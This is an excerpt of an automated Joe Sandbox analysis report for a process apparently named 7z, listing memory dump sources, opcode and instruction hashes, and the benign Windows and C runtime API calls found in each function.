                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionThrowfreemallocmemmove
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1097815484-0
                                                                                                                                                                                                                                          • Opcode ID: ff112bfad1453f99bb626e790325d578691dd91014c08a4cfe78a0c05c438efe
                                                                                                                                                                                                                                          • Instruction ID: 6c86ff317b1172472ee9ba28064eecba406bfdf4128d868a023bf958f23edf13
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff112bfad1453f99bb626e790325d578691dd91014c08a4cfe78a0c05c438efe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3901D1333012888BCB19DF26D46196DB760E388F99B08C129DF054B358CA34DC8ACB90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 00350A42
                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32 ref: 00350A73
                                                                                                                                                                                                                                            • Part of subcall function 0035B480: GetTickCount.KERNEL32 ref: 0035B49E
                                                                                                                                                                                                                                            • Part of subcall function 0035B480: strcmp.MSVCRT ref: 0035B4E3
                                                                                                                                                                                                                                            • Part of subcall function 0035B480: wcscmp.MSVCRT ref: 0035B502
                                                                                                                                                                                                                                            • Part of subcall function 0035B480: strcmp.MSVCRT ref: 0035B568
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalSectionstrcmp$CountEnterLeaveTickwcscmp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3267814326-0
                                                                                                                                                                                                                                          • Opcode ID: e88f57d7c7d95c69104a252a1c7d9368823166ee09aea818bbba8cc4799af9b9
                                                                                                                                                                                                                                          • Instruction ID: 32d78b87c5a104bb884da64917cd5e5b76963548490fe0bcdb6e2a6bbccd2dd0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e88f57d7c7d95c69104a252a1c7d9368823166ee09aea818bbba8cc4799af9b9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7BF05EA2224A5082E7229B25EC44799A364E744BB6F144334EE7D476E4CF38868AC314
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$memmove
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1534225298-0
                                                                                                                                                                                                                                          • Opcode ID: 586c8cc20f275266bf889dc5ef0a5fac6cb60cf56a6a0da5214c7ba1b0ee869b
                                                                                                                                                                                                                                          • Instruction ID: 8a91bcb8854948ca8a5520cdba6363cbceb9a4ac80e991954930afc1864963ca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 586c8cc20f275266bf889dc5ef0a5fac6cb60cf56a6a0da5214c7ba1b0ee869b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1E0376225854051CA25EB21E4510DB6720E7DE7F4B442321B6BF5B7F9DE28C6D6CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionThrowmalloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2436765578-0
                                                                                                                                                                                                                                          • Opcode ID: fa6ff63fb0a4f718842d089b3478a2da5176663da7f3a9e4140987a861a74cca
                                                                                                                                                                                                                                          • Instruction ID: 9f75c0e5354f9d9b3322fb8ffa64048bbadd038ecda87411683f357fbcbca094
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa6ff63fb0a4f718842d089b3478a2da5176663da7f3a9e4140987a861a74cca
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48D02284B1BA80E0EE0AAB10A8813081720A798341F801051E20E02334DA1CC28F8B00
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2cd451c15515d27b5fb79faae5e116a06c4e7ed636842f570073d620974bbfb5
                                                                                                                                                                                                                                          • Instruction ID: 2ea594cf4b752cdc5b080b13584b2df249ac172db2c85517381e2925ca8a5835
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cd451c15515d27b5fb79faae5e116a06c4e7ed636842f570073d620974bbfb5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6514C73244AD0A5C722CF25E8406EE7B61F389F98F6A4136DE9A0B719DF74C881C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteString
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4236320881-0
                                                                                                                                                                                                                                          • Opcode ID: 1f64ae9d3ddb337fcfe08435523e691609cde8a8f740f1935bab7fcecbb63b66
                                                                                                                                                                                                                                          • Instruction ID: 96b1a8da7d9e299d2ae852429af4105d77ea9a4ae97cf7347d1e118ebf1aeccf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f64ae9d3ddb337fcfe08435523e691609cde8a8f740f1935bab7fcecbb63b66
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E711821621878182E3728B18A4807BA6261E7847A4F644321FFDA57BE4EF3CCD85C705
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00318A60: SetFilePointer.KERNELBASE(?,?,00000003,?,00318E1D), ref: 00318A99
                                                                                                                                                                                                                                            • Part of subcall function 00318A60: GetLastError.KERNEL32(?,?,00000003,?,00318E1D), ref: 00318AA6
                                                                                                                                                                                                                                          • SetEndOfFile.KERNELBASE ref: 00318CC7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$ErrorLastPointer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 841452515-0
                                                                                                                                                                                                                                          • Opcode ID: c90e265412cd84312492c39e5ed9ff3a683aba44eb41e009ab2a5a4b09f96c43
                                                                                                                                                                                                                                          • Instruction ID: 8382bd629d40368d138353de3d4b1445dee3cbedeaf906f6b44e26a7c98256ca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c90e265412cd84312492c39e5ed9ff3a683aba44eb41e009ab2a5a4b09f96c43
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30E02612301894C7E7269FB1A8816EAD314AB49BE0F488031AA4543F48CF658DDA8714
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00316464: FreeLibrary.KERNELBASE(?,?,?,003164E7), ref: 00316475
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNELBASE ref: 003164F4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Library$FreeLoad
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 534179979-0
                                                                                                                                                                                                                                          • Opcode ID: 3a2e34574c688ca7af7f74dd229b4749d7d1e3364c56f11fc75fdd86188f9568
                                                                                                                                                                                                                                          • Instruction ID: 91fc21076b6e0880da59878929efab2673028f84161eb0b493afada23bd9e250
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a2e34574c688ca7af7f74dd229b4749d7d1e3364c56f11fc75fdd86188f9568
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CAD02B11701A1086EE1A1BF668432A503091F0ABD1F44C0309E0903311DE240CE79300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                                                          • Opcode ID: 1085791dad4498b16cc9abdee153caba491eab099019c6398aedde3617614eaf
                                                                                                                                                                                                                                          • Instruction ID: 3d9d939e9f99b0ce85f5b2a4c4b108dae98baeaa66f06a65041622e56006f704
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1085791dad4498b16cc9abdee153caba491eab099019c6398aedde3617614eaf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EAE04676228A40CBEB51CF60E800B4AB3A4F388B24F000118DE8E83B54CBBCC244CF80
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,?,?,003164E7), ref: 00316475
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                                                          • Opcode ID: 263427ff8568d61754d606e09aee6c08ed44ac838dad2c881132b4691fd57d34
                                                                                                                                                                                                                                          • Instruction ID: 82670ad8e2f2b6c69eaec54cdd1f891e1b378a069992aef5bce73eb8be4d1f0a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 263427ff8568d61754d606e09aee6c08ed44ac838dad2c881132b4691fd57d34
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25D012A2702904C5FF1B4FF3EC5537523586B5CF45F5D6010CE154B240EF2989D58760
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                                                          • Opcode ID: d6e337c251ae6e5d4ca8af2bcbb66e5cb8e311ff68b77760b7eea80f1dd1c151
                                                                                                                                                                                                                                          • Instruction ID: 6cbb746e550071f52d8cad5f551965295a92f514ba77513c32be8ba714dce4a3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6e337c251ae6e5d4ca8af2bcbb66e5cb8e311ff68b77760b7eea80f1dd1c151
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9CD01776614A84CAE7008F70E44575AF764F388B65F480004EA8807774CBBCC299CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: fputs
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1795875747-0
                                                                                                                                                                                                                                          • Opcode ID: 5f6c79e67240f10e506dcd010c05e3fcb41f145b375b3b6d5ae371637dca3dc7
                                                                                                                                                                                                                                          • Instruction ID: f284f506933aca9c474fbc658c321692f25e5c017d41da601aaaf9df90df1b5c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f6c79e67240f10e506dcd010c05e3fcb41f145b375b3b6d5ae371637dca3dc7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4D0A7D5700B4881DE119B26D8002A92321B74CBC4F044021DE9D0B314DA2CC2448B00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseFind
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1863332320-0
                                                                                                                                                                                                                                          • Opcode ID: 722c96f04a6826338d67a42852ca525e19c432cc1267ed16e2c090f8721fb2dc
                                                                                                                                                                                                                                          • Instruction ID: c6ec3d67ce9a1ed11b33daaeaab56dd512b53f9e8ff1171628133442b6109fce
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 722c96f04a6826338d67a42852ca525e19c432cc1267ed16e2c090f8721fb2dc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45D0A7B560990081DB361F79C8403A413629B58F70F1C0310C9B0493E0DF2484C68700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileTime
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1425588814-0
                                                                                                                                                                                                                                          • Opcode ID: 27dcbfd971054ac7552dc6a0aec683e37694d7ffe7d38722d02be5010972bc1d
                                                                                                                                                                                                                                          • Instruction ID: a33801612369a20c78db7f41b8cfa994c9e81d73cc2815677816fb37b5e20e29
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27dcbfd971054ac7552dc6a0aec683e37694d7ffe7d38722d02be5010972bc1d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43B09220B12800C6CB0C6722DC9231D13646788B26FE14429C60BD5660CD1C86E94700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
                                                                                                                                                                                                                                          • Instruction ID: 1d98a366fdd2df2122ddd471c9b8d0ca5abd92ee42412ed9fe5c3632ed02e5b0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5213A7370425097C726DB1AF88056B7798F745BB4F24A234FE6A8B784EB38C946C740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memmove.MSVCRT(?,?,?,?,?,00339B61), ref: 0033911C
                                                                                                                                                                                                                                            • Part of subcall function 00312130: malloc.MSVCRT ref: 00312134
                                                                                                                                                                                                                                            • Part of subcall function 00312130: _CxxThrowException.MSVCRT ref: 0031214F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionThrowmallocmemmove
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2847158419-0
                                                                                                                                                                                                                                          • Opcode ID: 82b4f0498024add381b52464ee5401255b55fdf908ae796dc16d5b0bf27a9309
                                                                                                                                                                                                                                          • Instruction ID: 591d757a25ffe8c4d33ae22e7a6d1d245339bdd61e142ce07286f6b2c73eb24c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82b4f0498024add381b52464ee5401255b55fdf908ae796dc16d5b0bf27a9309
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD21A237201B4095D716DF1AE85472BB3A0F788FA8F198225DF980B394DF78C892C740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1452528299-0
                                                                                                                                                                                                                                          • Opcode ID: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
                                                                                                                                                                                                                                          • Instruction ID: 71727df123e683428ebef91f38e6d0c8c3c49926eb5fb7fdcada6068df00e8d6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1113A627F566087CB3B8B6CE4507E87250F70C781B65B036DACA8BA10DB6ACCC2D201
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0033419C: free.MSVCRT ref: 003341B9
                                                                                                                                                                                                                                            • Part of subcall function 0033419C: free.MSVCRT ref: 003341C5
